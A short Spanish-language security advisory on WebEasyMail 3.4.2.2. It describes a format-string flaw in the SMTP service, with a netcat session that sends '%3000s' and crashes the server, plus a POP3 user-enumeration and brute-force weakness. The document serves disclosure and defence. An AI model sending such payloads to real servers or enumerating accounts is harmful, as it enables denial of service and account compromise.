WebEasymail se puede ver afectado por un problema de denegación de
servicio y por una debilidad que facilita los ataques por fuerza bruta.
Si un atacante envía una cadena de la familia printf especialmente
creada, puede conseguir la ejecución de código en el sistema atacado,
como ejemplo:

$ nc localhost 25
220 ESMTP on WebEasyMail [3.4.2.2] ready. http://www.winwebmail.com
%2
502 Error: command not implemented
%2s
502 Error: command not implemented
%100s
502 Error: command not implemented
%3000s
[emsrv.exe silently dies here]
$

Igualmente el servidor mencionado es muy débil frente los ataques por
fuerza bruta permitiendo a un atacante el intentar autenticarse frente
al servidor tantas veces como quiera, al igual que da pistas
importantes al atacante. Por ejemplo si un atacante procediera a
autenticarse mediante una cuenta de usuario y una clave, y ese usuario
no existiese el servidor le respondería con un «»-ERR invalid username»
pero si el usuario fuera valido y la clave no, el error que le daría
sería «-ERR wrong password for this user».

Antonio J. Román Arrebola
roman@hispasec.com

Más información:

WebEasyMail POP3 Server Valid User Name Information Disclosure Vulnerability
http://online.securityfocus.com/bid/5519/discussion/

Compártelo: